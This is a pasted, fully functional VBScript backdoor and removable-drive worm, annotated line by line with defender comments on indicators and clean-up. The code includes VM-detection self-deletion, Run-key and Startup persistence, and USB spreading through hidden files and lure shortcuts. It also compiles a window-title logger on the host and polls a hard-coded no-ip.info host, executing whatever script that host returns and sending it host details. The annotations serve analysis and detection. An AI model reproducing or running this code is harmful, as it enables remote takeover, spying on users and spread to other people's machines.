SecurityNajaf

#IL_Code 8920

Jan 25th, 2014
VB.NET 10.47 KB | None | 0 0
  1.  
  ' Main body of a VBScript backdoor that also spreads via removable drives (see xins).
  ' It creates its COM helpers, installs itself (ins), then polls a hard-coded HTTP endpoint
  ' forever and executes script text returned by that endpoint.
  ' Defender view: the host/port pair, the file name in FN and the "jnJnj" delimiter are indicators;
  ' wscript.exe making repeated outbound HTTP POSTs is the behaviour to alert on.
  2. On Error Resume Next
  ' Disables the Windows Script Host execution time limit so the loop below can run indefinitely.
  3. WScript.Timeout=0
  4. dim sh ' shell
  5. set sh =WScript.CreateObject("WScript.Shell")
  6. dim fs ' filesystem
  7. set fs= CreateObject("Scripting.FileSystemObject")
  ' w is the single XMLHTTP object used for every request to the remote endpoint.
  8. dim w
  9. Set w = CreateObject("Microsoft.XMLHTTP")
  ' dotnet records ("y"/"n") whether the .NET 2.0 VB compiler is present; the flag is reported by inf.
  10. dim dotnet
  11. dotnet="n"
  12. if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  13. dotnet="y"
  14. end if
  ' Virtual-machine check runs before any install step; see vmcheck.
  15. vmcheck
  ' Hard-coded remote endpoint (dynamic-DNS host name and TCP port) used by post.
  16. dim host
  17. host= "alsinyorq8.no-ip.info"
  18. Dim port
  19. port=1166
  ' DR/FN: install directory (%temp%\) and the file name the script copies itself under.
  20. Dim DR
  21. DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
  22. dim FN
  23. FN ="system.vbs"
  ' fh/fi hold the text-stream handles that ins opens on the two installed copies.
  24. dim fh
  25. dim fi
  ' us starts as the sentinel "~"; ins replaces it with "y" or "n" and inf reports it.
  26. dim us
  27. us="~"
  28. ins
  ' spl is the delimiter used to split the server response into a verb and its argument.
  29. dim spl
  30. spl="jnJnj"
  31. dim i
  32. i=0
  33. while true
  34. On Error Resume Next
  35. dim a
  36. WRT "readystate=" & w.readyState
  ' readyState 0 = no request opened yet: send the first check-in, with the current window title as body.
  37. if w.readystate=0 Then
  38. post "?mew", ActiveWindow
  39. end if
  ' readyState 4 = response complete: parse it as <verb><spl><argument>.
  40. if w.readystate=4 Then
  41. WRT "reading >> responseText"
  42. a= split(w.responseText,spl)
  43. if ubound(a)<>-1 Then
  44. select case a(0)
  ' "exc": the argument is passed to Execute, i.e. arbitrary VBScript supplied over the network
  ' runs inside this process. As displayed, both Replace calls swap a string for an identical one;
  ' whether the paste lost a character difference cannot be told from here.
  45. case "exc"
  46. dim sa
  47. sa= Replace( Replace( a(1),"post ","post "),"uns ","uns ")
  48. execute sa
  ' "uns": remote-triggered uninstall (see uns), with no follow-up command.
  49. case "uns"
  50. uns ""
  51. end select
  52. Else
  53. WRT "NO Commands! Sleep 5000"
  54. wscript.sleep 5000
  55. end If
  56. WRT "do until w.readystate=4"
  57. do until w.readystate=4
  58. wscript.sleep(1000)
  59. if x.status =0 or x.status= 200 then
  60. else
  61. exit do
  62. end if
  63. loop
  ' After handling a response, check in again with the current window title.
  64. post "?mew", ActiveWindow
  65. end if
  66.  
  67.  
  68.  
  69. WRT "Relax 5000ms"
  70. wscript.sleep 5000
  ' i counts loop passes: persistence and drive infection (xins) are re-applied on passes 2, 4 and 6,
  ' so deleting the Run values or shortcuts while the script is still running does not stick.
  71. i = i + 1
  72. if i= 2 or i =4 or i =6 then
  73. xins
  74. end if
  ' On the 7th pass the counter resets; a request that still has not completed is aborted and re-sent.
  75. if i>=7 then
  76. i=0
  77. if w.readystate<>4 Then
  78. WRT "readystate<>4 Aborting.."
  79. On Error Resume Next
  80. w.abort
  81. post "?mew",""
  82. end if
  83. end if
  84. wend
  ' vmcheck: analysis-environment check. Queries WMI Win32_ComputerSystemProduct and, if any
  ' product name contains "virtual" (case-insensitive), deletes the script file and then sleeps
  ' in an endless loop so nothing further executes.
  ' Analyst note: a run that shows no network or registry activity on a VM is explained by this branch.
  85. function vmcheck()
  86. On Error Resume Next
  87. Set WMI = GetObject("WinMgmts:")
  88. Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
  89. For Each Ob in Col
  90. if instr( lcase( ob.name),"virtual") >0 then
  91. On Error Resume Next
  ' Self-delete of the running script file.
  92. fs.deletefile(wscript.scriptfullname)
  ' Endless sleep: the process stays alive but does nothing else.
  93. do
  94. wscript.sleep(1000)
  95. loop
  96. end if
  97. next
  98. end Function
  99.  
  100.  
  ' ins: install routine. Records how the script was first launched, copies the script to
  ' %temp% and to the user's Startup folder, calls xins for registry persistence and drive
  ' infection, and, when the .NET 2.0 VB compiler exists, builds and starts a small helper
  ' executable that logs the foreground window title to the registry.
  ' Artifacts created here: HKCU\system.vbs value, %temp%\system.vbs, <Startup>\system.vbs,
  ' %temp%\system32..vb, %temp%\system32..exe.
  101. function ins
  102. on error resume Next
  ' Reads a marker value stored directly under HKEY_CURRENT_USER and named after FN.
  ' If the read fails, us keeps its "~" sentinel, which indicates a first run.
  103. us= sh.regread("HKEY_CURRENT_USER\" & fn)
  104. if us="~" then
  ' First run: "y" when the script path is <drive letter>:\<fn>, i.e. it was launched from a
  ' drive root (where xins places copies); otherwise "n". The flag is stored and later sent by inf.
  105. if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
  106. us="y"
  107. sh.regwrite "HKEY_CURRENT_USER\" & fn,  us, "REG_SZ"
  108. else
  109. us="n"
  110. sh.regwrite "HKEY_CURRENT_USER\" & fn,  us, "REG_SZ"
  111. end if
  112. end if
  113. Err.Clear
  ' Copy to %temp%\<fn> and open that copy in append mode (8); the handle stays in fh until uns
  ' closes it. NOTE(review): presumably this keeps the file open to hinder deletion - confirm.
  114. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  115. set fh = fs.OpenTextFile( dr & fn, 8, false)
  ' Any error in the copy/open above ends the script.
  116. if  Err.Number>0 then wscript.quit
  ' Second copy goes to the shell folder with id &H7 (the per-user Startup folder), also held open (fi).
  117. fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  118. set fi = fs.OpenTextFile( CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn, 8, false)
  119. xins
  120.  
  ' Everything below is skipped when vbc.exe (v2.0.50727) is not installed.
  121. Dim vbc
  122. vbc=sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  123. If fs.FileExists(vbc)=False Then Exit Function
  ' Stops any earlier helper instance, hidden window (style 0), before rebuilding it.
  124. sh.Run "cmd.exe /c taskkill /f /im system32..exe",0,False
  125. Dim src
  126. src= sh.ExpandEnvironmentStrings("%temp%") & "\system32..vb"
  127. If fs.FileExists(src) Then fs.DeleteFile src,True
  128. Dim otf
  129. Set otf = fs.OpenTextFile( src,2,True,false)
  ' Writes VB.NET source with ":" standing for line breaks and "!" for double quotes.
  ' The embedded module checks the foreground window every 2 seconds and, when its title has
  ' changed, stores the title in the HKCU registry value "ac" (read back by ActiveWindow).
  130. otf.Write replace( replace( "Module Module1:Private Declare Function GetForegroundWindow Lib !user32.dll! () As IntPtr:Private Declare Function GetWindowThreadProcessId Lib !user32.dll! (ByVal hwnd As IntPtr, ByRef lpdwProcessID As Integer) As Integer:Private Declare Function GetWindowText Lib !user32.dll! Alias !GetWindowTextA! (ByVal hWnd As IntPtr, ByVal WinTitle As String, ByVal MaxLength As Integer) As Integer:Private Declare Function GetWindowTextLength Lib !user32.dll! Alias !GetWindowTextLengthA! (ByVal hwnd As Long) As Integer:Dim owindow As String = !!:Function AC() As Boolean:Try:Dim hwd As IntPtr = GetForegroundWindow:If hwd <> IntPtr.Zero Then:Dim LN As Integer = GetWindowTextLength(CLng(hwd)):Dim w As String = StrDup(LN + 1, !*!):GetWindowText(hwd, w, LN + 1):Dim pid As Integer = -1:GetWindowThreadProcessId(hwd, pid):If w <> owindow Then:owindow = w:Return True:End If:End If:Catch ex As Exception:End Try:Return False:End Function:Sub Main():While True:If AC() Then:My.Computer.Registry.CurrentUser.SetValue(!ac!, owindow, Microsoft.Win32.RegistryValueKind.String):End If:Threading.Thread.CurrentThread.Sleep(2000):End While:End Sub:End Module",":",vbnewline),"!",chrw(34))
  131. otf.Close
  ' Compiles the source on the victim host with the system's own compiler (hidden window).
  ' Detection point: wscript.exe spawning vbc.exe against a source file in %temp%.
  132. sh.Run vbc & " " &  chrw(34) & src & chrw(34) & " /nowarn",0,False
  ' Waits up to 5 x 2 seconds for the compiled executable to appear.
  133. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  134. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  135. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  136. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  137. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  ' Starts the helper hidden and does not wait for it.
  138. sh.Run Replace(src,"system32..vb","system32..exe") ,0,False
  139. end Function
  140.  
  ' xins: (re)applies persistence and infects removable drives. Called once from ins and again
  ' periodically from the main loop.
  ' Persistence: a value named after FN under both the HKCU and HKLM ...\CurrentVersion\Run keys,
  ' each launching wscript.exe /b on the %temp% copy.
  ' Drive infection: on every ready removable drive the script is copied to the drive root, up to
  ' 20 files and up to 20 folders are marked hidden, and a same-named .lnk is created for each that
  ' starts the script copy first and then opens the original item.
  ' Triage hints: .lnk files in a drive root whose target is cmd.exe with "/c start system.vbs",
  ' hidden originals beside them, and a "! Videos" folder.
  141. sub xins
  142.     On error resume Next
  143.  
  ' Rewrites each Run value only when it differs from the expected command line.
  144.     If sh.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<> "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  145.         sh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  146.     End if
  147.     If sh.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<>"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  148.         sh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  149.     End if
  ' Changes the Explorer "Hidden" setting from 1 to 0.
  ' NOTE(review): appears intended to stop Explorer from showing the files hidden below - confirm.
  150.     If sh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Then
  151.         sh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  152.     End If
  153. for each xx in fs.Drives
  154. if xx.isready then
  155.     if xx.FreeSpace >0 then
  ' DriveType 1 is a removable drive in the FileSystemObject model.
  156.         if xx.drivetype=1 then
  ' Clears attributes on an existing copy so the overwrite below can succeed.
  157.             if fs.fileexists(xx.path & "\" & fn) then
  158.                 fs.getfile(xx.path & "\"  & fn).Attributes=0
  159.             end if
  160.             fs.copyfile dr & fn , xx.path & "\"  & fn,true
  ' mx caps the number of shortcuts created per pass at 20.
  161.             dim mx
  162.             mx=0
  163.            
  164.             for Each x In fs.GetFolder( xx.path & "\" ).Files
  165.                 if mx=20 then
  166.                     exit for
  167.                 end if
  168.                 wscript.sleep 1
  ' Only root-level files with an extension other than "lnk" are processed.
  169.                 if instr(x.name,".") Then
  170.                     if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
  ' Attribute 2 = hidden; this also hides the script copy itself.
  171.                         x.Attributes = 2
  172.                         if ucase(x.name) <> ucase(fn) Then
  173.                             mx =mx +1
  ' Shortcut "<file name>.lnk": target cmd.exe, minimised window (style 7), arguments start the
  ' script copy and then the hidden original, so the user still sees the file open.
  174.                             With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  175.                             .TargetPath = "cmd.exe"
  176.                             .WorkingDirectory = ""
  177.                             .WindowStyle=7
  178.                             .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  179.                             & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  ' The icon is looked up from the DefaultIcon registered for the original file's extension.
  180.                             .IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  181.                             if instr( .iconlocation,",")=0 then
  182.                                 .iconlocation = .iconlocation &",0"
  183.                             end if
  184.                             .Save()
  185.                             end with
  186.                         end if
  187.                     end if
  188.                 end if
  189.             Next
  190.             mx=0
  ' Creates a "! Videos" folder in the drive root before the folder pass; it is then treated
  ' like any other subfolder.
  191.             fs.CreateFolder(xx.path & "\! Videos\" )
  ' Same treatment for up to 20 root-level folders: hide the folder and add a .lnk that starts
  ' the script copy and then opens the folder in Explorer; icon index 3 of SHELL32.dll is used.
  192.             for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
  193.                 if mx=20 then
  194.                     exit for
  195.                 end if
  196.                     wscript.sleep 1
  197.                     x.Attributes = 2
  198.                     mx =mx +1
  199.                     With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  200.                     .TargetPath = "cmd.exe"
  201.                     .WorkingDirectory = ""
  202.                     .WindowStyle=7
  203.                     .Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34))  & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
  204.                     .IconLocation = "%windir%\system32\SHELL32.dll,3"
  205.                     .Save()
  206.                     end with
  207.             Next
  208.         end if
  209.     end if
  210. end if
  211. next
  212.  
  213. Err.Clear
  214. end sub
  ' WRT: debug trace. Writes s to standard output; any error from the write is suppressed by
  ' On Error Resume Next.
  215. Sub WRT(s)
  216. On Error Resume Next
  217.     WScript.Stdout.WriteLine s
  218. End Sub
  ' uns: uninstall routine, reached via the "uns" server verb. Removes the Run values, the
  ' %temp% and Startup copies, and the shortcuts on every ready drive, reports "?uns" to the
  ' server, optionally starts the command given in ex, then quits.
  ' Remediation note: this routine does not touch the HKCU\system.vbs marker, the HKCU\ac value,
  ' %temp%\system32..vb / system32..exe (or the running helper process), the changed Explorer
  ' "Hidden" setting, or the "! Videos" folder; those need separate clean-up.
  219. function uns(ex)
  220. on error resume Next
  221. WRT "uns"
  ' Releases the handles ins opened on the installed copies so they can be deleted.
  222. fi.close
  223. fh.close
  224. sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  225. sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  226. fs.DeleteFile dr & fn ,true
  227. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
  ' Unlike xins, this walk is not limited to removable drives: every ready drive with free space
  ' is processed.
  228. for each xx in fs.Drives
  229. if xx.isready then
  230. if xx.FreeSpace >0 then
  231. For Each x In fs.GetFolder( xx.path & "\").Files
  232. On Error Resume Next
  233. if instr(x.name,".") then
  234. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  ' Resets attributes to 0 on every root-level non-.lnk file, then deletes either the matching
  ' "<name>.lnk" or, for the script copy itself, the file.
  235. x.Attributes = 0
  236. if ucase(x.name) <> ucase(fn) then
  237. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  238. else
  239. fs.deletefile( xx.path & "\" & x.name )
  240. end if
  241. end if
  242. end If
  243.  
  244. Next
  ' Folders: delete "<folder>.lnk" when present and reset the folder's attributes to 0.
  245. For Each x In fs.GetFolder( xx.path & "\").SubFolders
  246. On Error Resume Next
  247.  
  248. if fs.fileexists( xx.Path & "\"  & x.Name &".lnk") then
  249. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  250. end if
  251. x.Attributes = 0
  252. Next
  253. end if
  254. end if
  255. Next
  ' Tells the server the uninstall ran, then waits at most 10 seconds for the request to finish.
  256. post "?uns",""
  257. Dim tout
  258. tout=0
  259. Do until w.readystate=4
  260. WRT "loop until readystate=4 Now=" & w.readystate
  261. wscript.sleep(1000)
  262. tout =tout + 1
  263. If tout=10 Then Exit do
  264. Loop
  265. WRT "BYE //ex=" & ex
  ' A non-empty ex is started through a hidden cmd.exe after a ping; the main loop always
  ' passes "", so a non-empty value can only come from server-supplied script text.
  266. if ex<>"" then
  267. sh.Run "cmd.exe /c ping 0&start " & ex,0, false
  268. end if
  269. wscript.quit
  270. end function
  ' state: references the XMLHTTP readyState of w. Not called anywhere in the visible listing.
  271. Function state
  272. return w.readyState
  273. End Function
  274.  
  ' post: sends an asynchronous HTTP POST to http://<host>:<port>/<cmd> with da as the body.
  ' The host profile string built by inf is sent as the value of a request header named
  ' "User-Agent:" (the name includes the colon as written).
  ' Network detection: plain-HTTP POSTs to paths "?mew" / "?uns" on the configured port, with
  ' a backslash-separated profile string starting "LOVER_" in the header value.
  275. function post(cmd ,da)
  276. On Error Resume Next
  277. WRT "POST: "  & cmd & " da=" & da
  ' Third argument true = asynchronous; callers poll w.readyState for completion.
  278. w.open "POST","http://" & host & ":" & port &"/" & cmd, true
  279. w.setRequestHeader "User-Agent:",  inf
  280. w.setRequestHeader "Connection:","Keep-Alive"
  281. w.send da
  282. end function
  283.  
  ' xinf caches the profile string so it is built only once per run.
  284. dim xinf
  ' inf: builds the host profile string sent with every request (see post). Fields, separated
  ' by "\": HWD identifier, computer name, user name, shortened OS caption with service pack,
  ' OS country code, the literal "0.4f", the us flag from ins, the dotnet flag, and the value
  ' returned by PID. Each field defaults to "??" if its lookup fails.
  285. function inf
  286. on error resume Next
  287. if xinf="" then
  288. dim s
  289. s="??"
  290. s = hwd
  291. inf = inf & s & "\"
  292. s="??"
  293. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  294. inf = inf & s & "\"
  295. s="??"
  296. s= sh.ExpandEnvironmentStrings("%USERNAME%")
  297. inf = inf & s & "\"
  298. s="??"
  ' OS caption, service pack and country code come from the first Win32_OperatingSystem instance.
  299. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  300. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  301. dim co
  302. For Each aaa in aa
  303. s= aaa.Caption  & " SP" & aaa.ServicePackMajorVersion
  304. co= aaa.countrycode
  305. exit for
  306. Next
  ' Shortens the caption: drops "Microsoft" and turns "Windows " into "Win".
  307. s= replace(s,"Microsoft","")
  308. s= replace(s,"Windows ","Win")
  309. s= Replace(s," Win","Win")
  ' NOTE(review): "0.4f" looks like a version tag for the script - confirm.
  310. inf = inf & s & "\" & co &"\0.4f\" & us &"\" & dotnet &"\" & pid  
  311. xinf=inf
  312. else
  313. inf=xinf
  314. end if
  315. end function
  316.  
  ' HWD: returns a host identifier of the form "LOVER_<volume serial number>", using the first
  ' Win32_LogicalDisk instance that has a non-empty VolumeSerialNumber; "LOVER_??" if none is found.
  ' The "LOVER_" prefix is a fixed string and therefore usable as a traffic indicator.
  317. function HWD
  318. HWD="LOVER_??"
  319. On Error Resume Next
  320. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  321. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  322. For Each aaa In aa
  323. if aaa.VolumeSerialNumber<>"" then
  324. HWD= "LOVER_" & aaa.VolumeSerialNumber
  325. exit for
  326. end if
  327. Next
  328. end Function
  329.  
  ' ActiveWindow: returns the HKCU registry value "ac", which the helper executable built in ins
  ' keeps updated with the foreground window title. The main loop sends this value as the POST body,
  ' so window titles (document names, page titles) leave the host with every check-in.
  330. Function ActiveWindow
  331. ActiveWindow=""
  332. ActiveWindow = sh.RegRead("HKEY_CURRENT_USER\ac")  
  333. End Function
  334.  
  ' PID: returns this script's own process id, obtained indirectly: it starts mshta.exe with
  ' sh.Exec, looks up that child in Win32_Process and reads its ParentProcessId. Returns 0 on failure.
  ' Detection point: wscript.exe spawning mshta.exe with no arguments; the visible code does not
  ' terminate that child process.
  335. Function PID
  336. PID=0
  337. on error resume next
  338. PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
  339. "Process.Handle='" & _
  340. sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
  341. End Function